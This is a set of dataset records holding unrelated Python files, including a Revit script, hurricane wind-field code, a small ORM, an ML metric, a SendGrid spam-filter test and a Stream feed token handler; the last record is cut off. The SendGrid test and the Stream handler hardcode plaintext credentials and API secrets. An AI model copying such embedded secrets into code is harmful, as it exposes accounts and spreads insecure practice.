+{"seq_id":"632005857","text":"import clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\n\ncats = UnwrapElement(IN[0])\nviews = UnwrapElement(IN[1])\n\nelementlist = list()\nfor cat in cats:\n\tcatlist = list()\n\tfor view in views:\n\t\ttry:\n\t\t\tif view.GetVisibility(cat):\n\t\t\t\tcatlist.append(True)\n\t\t\telse:\n\t\t\t\tcatlist.append(False)\t\n\t\texcept:\n\t\t\tcatlist.append(False)\n\telementlist.append(catlist)\nOUT = elementlist","sub_path":"nodes/0.7.x/python/View.CategoryIsVisible.py","file_name":"View.CategoryIsVisible.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373555294","text":"'''\n*No need to include any internal events as the resulting IEC-61499 has nothing such defined.\n*Supply the initial state as the first element in the list of locations to the Ha class. This eliminates the need to \nhave additional isInitial flags.\n*Do not duplicate any event name or variable name (internal, output or input) as BlokIDE at this point does not \npermit identically named elements and won't load the file. The variable the ODE is in (the internal variable) is declared \nby the compiler automatically. Abstain from using the same ODE variable elsewhere. This issue needs to be fixed.\n'''\n\n# The Reactor Plant example\n# Taken from page 387 of Principles of Cyber-physical systems. - Rajeev Alur.\n# See the inputvector described in reactorin.csv\n# The environment interface is reactorIO.c\n\n\nimport macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\n# ODEs of the system\n\node0 = Ode(sympify(\"diff(x(t))-0.1*x(t)+50\"), sympify(\"x(t)\"), 510, {})\node1 = Ode(sympify(\"diff(x(t))-0.1*x(t)+56\"), sympify(\"x(t)\"), 550, {})\node2 = Ode(sympify(\"diff(x(t))-0.1*x(t)+60\"), sympify(\"x(t)\"), 550, {})\n\n# CHANGED : Added the external interface of the hybrid automaton\n\n# Keys are the external events and the values are a list of external variables those events are associated with.\n# First dictionary correponds to the input and the second to the output. \nextEves = ExternalEvents({Event(\"add1\") : [], Event(\"add2\") : [], Event(\"remove1\") : [], Event(\"remove2\") : [], Event(\"refresh1\") : [], Event(\"refresh2\") : [] }, { })\n# List of external variables. 
Fist list corresponds to the input and second to the output.\nextVars = ExternalVars([Symbol(\"y\"), Symbol(\"timer1\"), Symbol(\"timer2\")],[])\n\n# The locations of the hybrid automaton\nt0 = Loc(\"t0\", [ode0], [],\n {S(\"x(t)\"): [Guard(S(\"x <= 550\"))]})\nt1 = Loc(\"t1\", [ode1], [],\n {S(\"x(t)\"): [Guard(S(\"x>=510\"))]})\nt2 = Loc(\"t2\", [ode2], [],\n {S(\"x(t)\"): [Guard(S(\"x>=510\"))]})\n\n\n# The edges\ne1 = Edge('t0', 't1', {S(\"x(t)\"): [Guard(S(\"x>=550\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"add1\")])\ne2 = Edge('t1', 't0', {S(\"x(t)\"): [Guard(S(\"x<=510\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"remove1\")])\ne3 = Edge('t0', 't2', {S(\"x(t)\"): [Guard(S(\"x>=550\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"add2\")])\ne4 = Edge('t2', 't0', {S(\"x(t)\"): [Guard(S(\"x<=510\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"remove2\")])\n\n# CHANGED : Added extEves, extVars arguments\nreactorPlant = Ha(\"reactor\", [t0, t1, t2], t0,\n [e1, e2, e3, e4], [], [], extEves, extVars)\n\n\n# Compile\n# shac.compile(reactorPlant)\n","sub_path":"compiler/example generated xml/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597277056","text":"#!/usr/bin/python\n# Testing Objective: Send message that contains medium spam test string\n\n\nimport sendgrid \nfrom sendgrid import SendGridClient\nfrom sendgrid import Mail\n\n# make a secure connection to SendGrid\nsg = SendGridClient('satest8', 'Sunshine1', secure=True)\n\n# make a message object\nmessage = Mail()\nmessage.set_subject('Spam String Test - Medium')\nmessage.set_text('XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-MXL09*C.34X')\nmessage.set_from('satest8@gmail.com')\n\n# add a recipient\nmessage.add_to('SA ')\n\n# use the Web API to send your message\nsg.send(message)\n\n\n","sub_path":"spam_tests/sendgrid_medium_spam.py","file_name":"sendgrid_medium_spam.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"62113531","text":"from osgeo import gdal, ogr, osr\nimport numpy\nimport pylab, math, os, sys,json,datetime,glob\n\n#########################################################\n#Function for getting HURDAT data into the correct format for subsequent processing\ndef prep_HURDAT(raw_hurdat,csv_folder,storm_split_str = 'AL'):\n check_dir(csv_folder)\n\n #Read in HURDAT data\n o = open(raw_hurdat,'r')\n\n #Split out by storm (lines that start with AL)\n lines = o.read().split(storm_split_str)\n lines = [i for i in lines if i != '']\n o.close()\n\n allJSON = []\n \n #Iterate across each storm\n for h in lines:\n\n h_out = []\n\n #Clean up the data\n h = h.split('\\n')\n if len(h) > 1:\n h = [i.split(',') for i in h]\n header = h[0]\n header = [i.strip() for i in header]\n h = h[1:]\n \n h = [[i2.strip() for i2 in i] for i in h if i[0] != '' and int(i[6]) > 0 and int(i[7]) > 0]\n \n #If there are obs for the storm, process it\n if len(header) ==4 and len(h) > 1 and len(header[0]) > 0:\n name = header[1]\n if name == 'UNNAMED':\n name = header[2]\n year = header[0][2:]\n out_csv = os.path.join(csv_folder,name + '-'+year+'.csv')\n if os.path.exists(out_csv) == False:\n hLines = []\n hLinesCSV = ''\n #Set up outputs for storm\n hObj = {}\n\n hObj['name'] = name\n hObj['year'] = int(year)\n\n for line in h:\n lineObj = 
{}\n\n #Get relevant fields and format them\n date = line[0]\n time = line[1]\n y = int(date[:4])\n m = int(date[4:6])\n d = int(date[6:])\n h =int(time[:2])\n minutes = int(time[2:])\n \n date = datetime.datetime(y,m,d,h,minutes)\n out_date = date.strftime(\"%b %d,%H:%M:%S GMT\")\n \n lineObj['date'] = out_date\n \n lat = float(line[4][:-1])\n lon = float(line[5][:-1])\n if line[4][-1] == 'S':lat = lat*-1\n if line[5][-1] == 'W':lon = lon*-1\n lineObj['lat'] = lat\n lineObj['lon'] = lon\n lineObj['pres'] = int(line[7])\n lineObj['wspd'] = int(line[6])\n hLines.append(lineObj)\n\n\n hLinesCSV += ','.join([out_date,str(lineObj['lat']),str(lineObj['lon']),str(lineObj['wspd']) + ' mph',str(lineObj['pres']) + ' mb\\n'])\n \n \n hObj['track'] = hLines\n allJSON.append(hObj)\n \n o = open(out_csv,'w')\n o.write(hLinesCSV)\n o.close()\n\n #Refine storm track\n try:\n refineStormTrack(out_csv,name,year)\n except Exception as e:\n print(e)\n #Write a master json- not used currently \n o = open(csv_folder + os.path.basename(os.path.splitext(raw_hurdat)[0]) + '_all.json','w')\n o.write(json.dumps(allJSON))\n o.close()\n############################################################## \n#Function for interpolating track input entries\ndef refineStormTrack(input_track,storm_name,storm_year):\n Today = datetime.datetime.utcnow()\n\n stormname,stormyear =storm_name,storm_year\n stormyear = int(stormyear)\n csvname = os.path.splitext(input_track)[0]\n outfile = open(csvname+'-refined.csv','w')\n outfileJSON = open(csvname+'-refined.json','w')\n refinement_factor = 3\n\n def GetTime( X ):\n mytime = X.split(',')[1].split(':')\n hour = int(mytime[0])\n mins = 60*int(hour)+int(mytime[1].split(' ')[0])\n return mins\n\n def GetInfo( X ):\n fields = X.strip().split(',')\n lat = float( fields[2])\n lon = float( fields[3])\n WS = float( fields[4].split(' ')[0] )\n Pr = float( fields[5].split(' ')[0])\n return [lat,lon,WS,Pr]\n\n def Interp( s, e, f ):\n return (1.-f)*s+f*e\n\n # read csv file of storm track data\n trackfile = open(csvname + '.csv','r')\n track = trackfile.readlines()\n trackfile.close()\n\n # set start date\n start = track[0]\n start_time = GetTime( start )\n start_info = GetInfo( start )\n\n # loop through file\n \n jsonList = []\n for end in track[1:]:\n # read end date\n end_time = GetTime( end )\n end_info = GetInfo( end )\n if start_time>end_time:\n end_time += 24*60\n\n # loop over time between\n desired_dt = int( (end_time-start_time)/refinement_factor )\n for t in range(0, end_time-start_time, desired_dt):\n # linear interpolate time, position and other parameters\n fraction = float(t) / float(end_time-start_time)\n new_mins = Interp( start_time, end_time, fraction )\n new_lat = Interp( start_info[0], end_info[0], fraction )\n new_lon = Interp( start_info[1], end_info[1], fraction )\n new_WS = Interp( start_info[2], end_info[2], fraction )\n new_Pr = Interp( start_info[3], end_info[3], fraction )\n\n # write new record\n hr =int(new_mins/60.)\n mins = new_mins-hr*60\n if hr > 23:\n hr = 0\n fields = start.strip().split(',')\n\n OutputDate = datetime.datetime.strptime(fields[0].strip(), '%b %d')\n if stormyear > Today.year:\n Forecast = 'F'\n elif stormyear == Today.year:\n if OutputDate.month > Today.month:\n Forecast = 'F'\n elif OutputDate.month == Today.month:\n if OutputDate.day > Today.day:\n Forecast = 'F'\n elif OutputDate.day == Today.day:\n if hr > Today.hour:\n Forecast = 'F'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n else:\n Forecast = 'O'\n if 
Forecast == 'F':\n refinement_factor = 24\n out = '%s,%02d:%02d GMT,%4.2f,%4.2f,%d mph,%d mb,%s,%s,%s\\n'% (fields[0],hr,mins,new_lat,new_lon,new_WS,new_Pr,fields[-2],fields[-1], Forecast)\n outfile.write( out )\n\n fields = out.strip().split(',')\n wspd = fields[4].split('m')[0]\n pres = fields[5].split('m')[0]\n jsonList.append({'date':fields[0]+':'+fields[1],\n 'lat':float(fields[2]),\n 'lon':float(fields[3]),\n 'wspd':float(wspd),\n 'pres':float(pres),\n 'FO':fields[-1]})\n start = end\n start_time = GetTime(end)\n start_info = end_info\n\n outfileJSON.write(json.dumps(jsonList))\n outfile.close()\n outfileJSON.close()\n#########################################################\n#Function for creating directory if it doesn't exist\ndef check_dir(in_path):\n if os.path.exists(in_path) == False:\n print('Making dir:', in_path)\n os.makedirs(in_path)\n#########################################################\n#Adapted from https://gis.stackexchange.com/questions/167069/simple-gdal-coordinate-conversion\n#Converts a coordinate in one projection to another\ndef geogToProj(lng,lat,fromEPSG = 4326,toEPSG = 32616):\n InSR = osr.SpatialReference()\n InSR.ImportFromEPSG(fromEPSG) # Geographic\n OutSR = osr.SpatialReference()\n OutSR.ImportFromEPSG(toEPSG) #output\n\n Point = ogr.Geometry(ogr.wkbPoint)\n Point.AddPoint(lng,lat) # use your coordinates here\n Point.AssignSpatialReference(InSR) # tell the point what coordinates it's in\n Point.TransformTo(OutSR) # project it to the out spatial reference\n return {'x':Point.GetX(),'y':Point.GetY()} # output projected X and Y coordinates\n#########################################################\ndef getTransform(centerX,centerY,width,height,res):\n left = centerX - math.floor(width/2.)*res\n top = centerY + math.ceil(height/2.)*res\n return [left, float(res), 0.0, top, 0.0, -1. * res]\n##############################################################################################\n#Converts between Numpy and GDAL data types\ndt_dict = {'u1': 'Byte', 'uint8' : 'Byte', 'uint16': 'UInt16','u2': 'UInt16', 'u4': 'UInt32', 'i2' : 'Int16','i4':'Int32', 'int16':'Int16', 'Float32' : 'float32','float32' : 'Float32', 'Float64' : 'float64','float64' : 'Float64'}\n##############################################################################################\n#########################################################\ndef writegeotiff( transform, Output, Title, ncols, nrows,epsg,out_no_data = 255,dt = 'u1'):\n output_raster = gdal.GetDriverByName('GTiff').Create(Title,int(ncols), int(nrows), 1 ,eval('gdal.GDT_'+dt_dict[dt]))#Float32)\n output_raster.SetGeoTransform( transform )\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(epsg)\n output_raster.SetProjection( srs.ExportToWkt() )\n output_raster.GetRasterBand(1).SetNoDataValue(out_no_data)\n \n output_raster.GetRasterBand(1).WriteArray( Output.astype(dt)) \n Min,Max,Mean,Std = output_raster.GetRasterBand(1).ComputeStatistics(0)\n output_raster.GetRasterBand(1).SetStatistics(Min,Max,Mean,Std)\n output_raster.FlushCache()\n#########################################################\ndef CalcStormMotion(y1,y2,x1,x2,dt):\n # return storm velocity components in meters per second\n V = (y2-y1) * 111. *1000/ float(dt)\n U = (x2-x1) * math.cos(y1*math.pi/180.) * 111. 
*1000/ float(dt)\n return U,V\n#########################################################\ndef getWind(current,future,frames_output_folder,storm_name,window_width,window_height,res,wind_nodata,wind_threshold,epsg,wind_summary,write_frames = False):\n mytime = current['date'].split(':')\n cseconds = 3600*int(mytime[1])+60*int(mytime[2].split()[0])\n mytime = future['date'].split(':')\n fseconds = 3600*int(mytime[1])+60*int(mytime[2].split()[0])\n if fseconds < cseconds:\n fseconds += 24*60*60\n\n out_filename = os.path.join(frames_output_folder,storm_name+'_'+'_'.join([current['date'],future['date']]).replace(' ','_').replace(':','_')+'_wind.tif')\n print('Creating:',out_filename)\n CurrentLat = current['lat']\n CurrentLon = current['lon']\n FutureLat = future['lat']\n FutureLon = future['lon']\n\n MaxWind = current['wspd']\n CentralPressure = current['pres']\n FutureMaxWind = future['wspd']\n FutureCentralPressure = future['pres']\n HurricaneMotionU, HurricaneMotionV = CalcStormMotion(CurrentLat,FutureLat,CurrentLon,FutureLon,fseconds-cseconds)\n\n Lat = CurrentLat\n Lon = CurrentLon\n Wind = MaxWind\n Pressure = CentralPressure\n\n # xc, yc = convert2grid(Lat,Lon,topo_info)\n\n Pc = Pressure * 100.\n Pe = 1013. *100.\n if Pe <= Pc:\n Pe = Pc * 1.05\n deltaP = (Pe-Pc)/100.\n Rmax = ( math.exp(2.636-0.00005086*deltaP**2+0.037842*28.)) * 1000.\n\n HSpd = math.sqrt( HurricaneMotionU**2+HurricaneMotionV**2 )\n HDir = math.atan2( HurricaneMotionV, HurricaneMotionU )\n \n\n def getWindAtDist(px,py):\n umin = 1000.\n r = -1\n r0 = 1200.*1000.\n a = 0.25\n m =1.6\n n = 0.9\n r = numpy.sqrt(py**2+px**2)\n \n \n f1 = (Wind-HSpd)**2\n f2 = ((r0-r)/(r0-Rmax))**2\n f3 = (r/Rmax)**2\n \n t1n = (1.-a)*(n+m)\n t1d = n+m*(r/Rmax)**(2.*(n+m))\n t2n = a*(1.+2.*m)\n t2d = 1.+2.*m*(r/Rmax)**(2.*(m+1.))\n Vholland=numpy.sqrt(f1*f2*f3*(t1n/t1d+t2n/t2d))\n \n # if r > 0:\n Vholland[r <=0] = 0\n \n Beta = -HDir - numpy.arctan2(py,px)\n \n rotation = HSpd*numpy.sin(-Beta)\n u = (Vholland +rotation) #/ 0.44704\n del(r)\n del(Vholland)\n del(Beta)\n del(rotation)\n return u\n\n #Set up distance grid\n #Distane grid is expected to be ascending in x direction from west to east\n #And ascending in the y direction from north to south (opposite of normal)\n gridWidth = window_width*res\n gridHeight = window_height*res\n \n row = numpy.array([numpy.arange(-gridWidth,gridWidth+1,res).astype('float32')])\n px = numpy.repeat(row,row.shape[1],0)\n py = numpy.repeat(numpy.rot90(row),row.shape[1],1)*-1\n \n #Get wind at distance\n u =getWindAtDist(px,py)\n\n #Use this to get the wind at a specific distance\n # print(getWindAtDist(numpy.array([20174.875]),numpy.array([12400])))\n \n u[u 0 and Hgt > 0: #Hgt > 0 and Spacing > 0 and Hgt - CBH>0:\n# Z = 1.3\n# b = 2.*CrownDepth/Hgt\n# l = b*CrownDepth/Spacing*0.5\n# G35 = (1.-math.exp(-math.sqrt(15*l)))/math.sqrt(15*l)\n# D = Hgt*(1.-G35)\n# UstarRatio = min(0.3, math.sqrt(0.003+0.3*l))\n# PsiH = 0.193\n# Z0H = G35*math.exp(-0.4/UstarRatio-PsiH)\n# HD = Spacing / Hgt\n# z0 = Z0H * Hgt\n# BMmean = 0.68*HD-0.0385+(-0.68*HD+0.4785)*(1.7239*HD+0.0316)**(5)\n# BMmax = 2.7193*HD-0.061+(1.273*HD+0.9701)*(1.1127*HD+0.0311)**5\n# G = BMmax/BMmean\n# MOR = ModRupture*6894.757\n# Mcrit = 0.00358811*MOR\n# try:\n# M = 1.22*(D-Z)*1.226*G*(0.4*Spacing*WindSpeed/math.log((Hgt-D)/z0))**2\n# except:\n# print(Hgt,Spacing, WindSpeed)\n# print(D, Z, G, Spacing, WindSpeed, Hgt, z0)\n# if M<0:\n# print('Negative M: ', BMmax, BMmean, Hgt, Spacing, WindSpeed, CBH)\n\n# R = M/Mcrit - 1.\n# return ( int(100. 
* math.exp(R) / (math.exp(R)+1.) ) - 50) *2\n# else:\n# return 0\n\n##################################################################\n","sub_path":"CreateHurricaneWindFieldsAndGALESOptimized_lib.py","file_name":"CreateHurricaneWindFieldsAndGALESOptimized_lib.py","file_ext":"py","file_size_in_byte":17016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558830795","text":"import matplotlib.pyplot as plt\nn = 200\nn_last = 150\n\n\nif __name__ == '__main__':\n\n\n\n\tstats = {}\n\tTB_list = [20, 23, 25, 27, 28, 29, 30, 31, 32, 33, 35, 37, 40]\n\n\n\n\tfor TB in TB_list:\n\n\n\t\tstats[TB] = {}\n\n\n\t\tfilename = \"./data_TB/statistic_TB\" + str(TB) + \".ibd\"\n\t\tfile = open(filename, \"r\")\n\n\t\tcount = 0\n\t\twhile 1:\n\t\t\tline = file.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\n\t\t\tcount += 1\n\t\t\tif count == 1:\n\t\t\t\tcontinue\n\n\t\t\tline = (line.strip()).split(\" \")\n\t\t\ti = int(line[0])\n\t\t\tfraction = float(line[1])\n\t\t\tstats[TB][i] = fraction\n\n\n\n\n\n\n\t## draw the likelihood curve, for N = 5000\n\tx = []\n\ty = []\n\tfor TB in TB_list:\n\n\t\tx.append(TB)\n\n\t\tdistance = 0\n\t\ti = 5\n\t\twhile i < n_last:\n\t\t\tdistance += (stats[30][i] - stats[TB][i]) * (stats[30][i] - stats[TB][i])\n\t\t\ti += 5\n\t\ty.append(distance)\n\n\n\n\n\t## actually draw the figure\n\tplt.figure()\n\t#plt.plot(x, y, \"*-\",label=\"$N=10000$\", color=\"blue\")\n\tplt.plot(x, y, \"*-\", color=\"blue\")\n\tplt.plot([30], [0], \"o-\", color=\"red\", label=\"true TB\")\n\n\n\n\n\n\tplt.xlabel(\"TB\")\n\tplt.ylabel(\"Sum of Squared Distance\")\n\tplt.title(\"Distance Curve for $TB_{real}$ = 30 (50 * 20 times for averaging)\")\n\t#plt.ylim(0, 1)\n\t#plt.xlim(0, 200)\n\tplt.legend(loc=1)\n\tplt.grid('on')\n\tplt.show()\n","sub_path":"plot_like_TB.py","file_name":"plot_like_TB.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155759646","text":"import sqlite3, os, functools, collections\nfrom .fields import Field, Title\nfrom sqlite_wrapper import create_table, verify_table_columns \n\n# Inspired by Django's BaseModel this will serve as a base from which\n# all future models (in the database schema) will be derivatives of.\nclass BaseModel(type):\n\n #This is we can keep the items sorted from 'dct' in __new__ otherwise the\n #dct instance will be a dict() and thus .items() will be unordered == bad!\n @classmethod\n def __prepare__(self, *args, **kwargs):\n\n return collections.OrderedDict()\n\n # How the new class is to be created...\n def __new__(meta, name, bases, dct):\n\n # we want to ensure every model class has a _meta attribute\n # that can be accessed through the ORM for various things...\n if 'Meta' not in dct:\n dct['Meta'] = type('Meta', (object,), {})\n _meta = dct.pop('Meta')\n _meta.fields = collections.OrderedDict()\n _meta.table_name = name\n\n #Go ahead and create the class....\n cls = super().__new__(meta, name, bases, dct)\n # Sets _meta attribute to contain the models fields and other attributes.\n cls._meta = _meta\n\n # Note: The fields here from dct will still be in ordered \n # when transferring to the other OrderedDict due to the \n # __prepare__ method above...\n for k, v in dct.items():\n # If the item in the class dict is a Field / subclass\n # then collect it in the _meta's field attribute.\n if isinstance(v, Field):\n cls._meta.fields[k] = v\n setattr(v, 'name', k)\n setattr(v, 'model', cls)\n\n # 
If the model is laballed as abstract we want to check \n # whether it inherited this abstract property, or if the\n # model is actually meant to be abstract to ensure that\n # all tables are properly created...\n inherited = False\n for base in bases:\n _meta.fields.update(base._meta.fields)\n if not inherited and getattr(base._meta, 'abstract', False):\n inherited = True\n\n # Two cases, is abstract -> due to subclass and we want to\n # create the table anyways.\n if 'abstract' in _meta.__dict__:\n abstract = getattr(_meta, 'abstract', False)\n if (inherited and not abstract) or not abstract:\n create_table(cls, name)\n else:\n create_table(cls, name)\n return cls\n\nclass Model(metaclass=BaseModel):\n\n #This simply verifies that the kwargs passed are valid\n #columns for the models table in the database, this ensures\n #that the setattr() is setting valid attributes and that the\n #save method will not run into (column / data) issues. Others\n #such as integrity etc can still occur of course.\n\n @verify_table_columns\n def __init__(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n \"\"\" This simply overrides the __setattr__ method in order\n to check if the user is attempting to alias the field\n definitions to something else if so, then we delegate this\n action to the fields property (setter) in order to change \n the fields value only instead of changing the field \n definition itself.\n\n Note: \n\n This also saves from doing --> (Field Name).value = * \n and they can simply do --> (Field Name) = * \n in order to change the value that the field has. \"\"\"\n\n def __setattr__(self, name, value):\n\n if name in self._meta.fields:\n self._meta.fields[name].value = value\n super().__setattr__(name, value)\n \n def save(self):\n\n field_values = [x.value for x in self._meta.fields.values()]\n row = {k: v for k,v in zip(self._meta.fields, field_values)}\n return self.sqlite.insert(self, **row)\n\n # This serves as the base model from which derivatives may be formed\n # thus we want it to be represented abstractly rather than appearing\n # within the schema since the user has no direct interaction with\n # this base unless specified explicitly.\n class Meta:\n\n abstract = True","sub_path":"models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236603234","text":"import os\nimport torch\nimport inspect\n\nfrom .utils.load_checkpoint import load_checkpoint\nfrom .utils.functional import *\nfrom .utils.preprocess import *\nfrom .model.net2 import Net2\n\n\nMODEL_CONFIG = {\"net_type\": Net2, \"n_class\": 3, \"use_dist\": False, \"use_dist_angles\": False,\n \"n_points\": 17}\n\nCHECKPOINT = \"assets/pretrained.pth\"\n\n\ndef init_model(model_configs, checkpoint):\n model = model_configs[\"net_type\"](**MODEL_CONFIG)\n model = load_checkpoint(model, checkpoint)\n if torch.cuda.is_available():\n model = model.cuda()\n model.eval()\n return model\n\n\ndef predict(model, landmarks):\n landmarks = torch.tensor(landmarks)\n if torch.cuda.is_available():\n landmarks = landmarks.cuda().float()\n landmarks = torch.unsqueeze(landmarks, 0) # add batch dimension\n outputs = model(landmarks)\n outputs = outputs.cpu().detach().numpy()\n return outputs\n\n\ndef landmarks_to_angles_model():\n checkpoint_abs_path = os.path.join(os.path.split(os.path.abspath(inspect.getfile(predict)))[0], CHECKPOINT)\n model = init_model(MODEL_CONFIG, 
checkpoint_abs_path)\n return model\n\n\ndef to_angles(landmarks, model):\n if MODEL_CONFIG[\"n_points\"] == 68:\n landmarks = landmarks\n elif MODEL_CONFIG[\"n_points\"] in mapping_points:\n landmarks = mapping_points[MODEL_CONFIG[\"n_points\"]](landmarks)\n else:\n print(\"[ERROR] %d-point landmarks is not supported\" % MODEL_CONFIG[\"n_points\"])\n quit()\n if MODEL_CONFIG[\"use_dist\"]:\n landmarks = normalize_dist(points_to_dists(landmarks))\n elif MODEL_CONFIG[\"use_dist_angles\"]:\n landmarks = landmarks_to_dist_angles(landmarks)\n else:\n landmarks = normalize_landmarks(standardize_landmarks(landmarks))\n pose = predict(model, landmarks)[0]\n return pose\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"landmarks_to_angles/landmarks_to_angles.py","file_name":"landmarks_to_angles.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150755663","text":"import torch\n\nfrom .metric import Metric\n\n\nclass MeanReciprocalRank(Metric):\n\n def __init__(self, *args, mode='prob', **kwargs):\n super().__init__(*args, **kwargs)\n self.update = {\n 'prob': self.update_prob,\n 'idx': self.update_idx}[mode]\n\n def reset(self, mode='prob'):\n self.ranks = []\n\n def update(self, output):\n raise NotImplementedError()\n\n def update_prob(self, output):\n probs, target = output\n if (probs < 0).any():\n assert (probs <= 0).all()\n probs = torch.exp(probs)\n correct_prob = probs.gather(1, target.unsqueeze(1))\n rank = (probs >= correct_prob).sum(dim=1)\n self.ranks.append(rank.cpu())\n\n def update_idx(self, output):\n pred_idx, target = output\n matches = pred_idx == target.unsqueeze(1)\n bs, max_rank = pred_idx.shape\n rank = torch.zeros(bs).long() + max_rank\n match_batch_idxs, match_rank = matches.nonzero().t().cpu()\n # + 1 to convert from zero-indexed to rank\n rank[match_batch_idxs] = match_rank + 1\n self.ranks.append(rank)\n\n def compute(self):\n rank = torch.cat(self.ranks)\n return (1 / rank.float()).mean()\n","sub_path":"dougu/ignite/metrics/mean_reciprocal_rank.py","file_name":"mean_reciprocal_rank.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112910775","text":"from respond import respond\nimport stream\n\n\ndef get_token(event):\n\ttry:\n\t\tclient = stream.connect('mwb8vtrjbmak', 'vqamq876cznxede4fvgpt247w82pwuxs3wwru8sku7nv9w8azp6ae5zn52cp6qz9',\n\t\t\t\t\t\t\t\tlocation='us-east')\n\t\tuser_feed = client.feed(event['queryStringParameters']['mode'], event['queryStringParameters']['user'])\n\t\treturn respond(None, user_feed.get_readonly_token(), None)\n\texcept Exception as e:\n\t\treturn respond(e, None, 502)\n","sub_path":"API/getToken.py","file_name":"getToken.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"396075593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016-2017:\n# Matthieu Estrada, ttamalfor@gmail.com\n#\n# This file is part of (CMakeConverter).\n#\n# (CMakeConverter) is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# (CMakeConverter) is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with (CMakeConverter). If not, see .\n\n\"\"\"\n Data Files\n ==========\n Manage the **VS Project** data and creation of **CMakeLists.txt** file\n\"\"\"\n\nfrom lxml import etree\n\nfrom cmake_converter.message import send\n\n\ndef get_vcxproj_data(vs_project):\n \"\"\"\n Return xml data from \"vcxproj\" file\n\n :param vs_project: the vcxproj file\n :type vs_project: str\n :return: dict with VS Project data\n :rtype: dict\n \"\"\"\n\n vcxproj = {}\n\n try:\n tree = etree.parse(vs_project)\n namespace = str(tree.getroot().nsmap)\n ns = {'ns': namespace.partition('\\'')[-1].rpartition('\\'')[0]}\n vcxproj['tree'] = tree\n vcxproj['ns'] = ns\n assert 'http://schemas.microsoft.com' in ns['ns']\n except AssertionError: # pragma: no cover\n send(\n '.vcxproj file cannot be import, because this file does not seem to comply with'\n ' Microsoft xml data !',\n 'error'\n )\n exit(1)\n except (OSError, IOError): # pragma: no cover\n send(\n '.vcxproj file cannot be import. '\n 'Please, verify you have rights to this directory or file exists !',\n 'error'\n )\n exit(1)\n except etree.XMLSyntaxError: # pragma: no cover\n send('This file is not a \".vcxproj\" file or XML is broken !', 'error')\n exit(1)\n\n return vcxproj\n\n\ndef get_propertygroup(target, platform, attributes=''):\n \"\"\"\n Return \"propertygroup\" value for wanted platform and target\n\n :param target: wanted target: debug | release\n :type target: str\n :param platform: wanted platform: x86 | x64\n :type platform: str\n :param attributes: attributes to add to namespace\n :type attributes: str\n :return: \"propertygroup\" value\n :rtype: str\n \"\"\"\n\n prop_deb_x86 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Debug|Win32\\'\"%s]' % \\\n attributes\n prop_deb_x64 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Debug|x64\\'\"%s]' % \\\n attributes\n prop_rel_x86 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Release|Win32\\'\"%s]' % \\\n attributes\n prop_rel_x64 = \\\n '//ns:PropertyGroup[@Condition=\"\\'$(Configuration)|$(Platform)\\'==\\'Release|x64\\'\"%s]' % \\\n attributes\n\n propertygroups = {\n 'debug': {\n 'x86': prop_deb_x86,\n 'x64': prop_deb_x64,\n },\n 'release': {\n 'x86': prop_rel_x86,\n 'x64': prop_rel_x64\n }\n }\n\n return propertygroups[target][platform]\n\n\ndef get_definitiongroup(target, platform):\n \"\"\"\n Return ItemDefinitionGroup namespace depends on platform and target\n\n :param target: wanted target: debug | release\n :type target: str\n :param platform: wanted platform: x86 | x64\n :type platform: str\n :return: wanted ItemDefinitionGroup namespace\n :rtype: str\n \"\"\"\n\n item_deb_x86 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Debug|Win32\\'\"]'\n item_deb_x64 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Debug|x64\\'\"]'\n item_rel_x86 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n 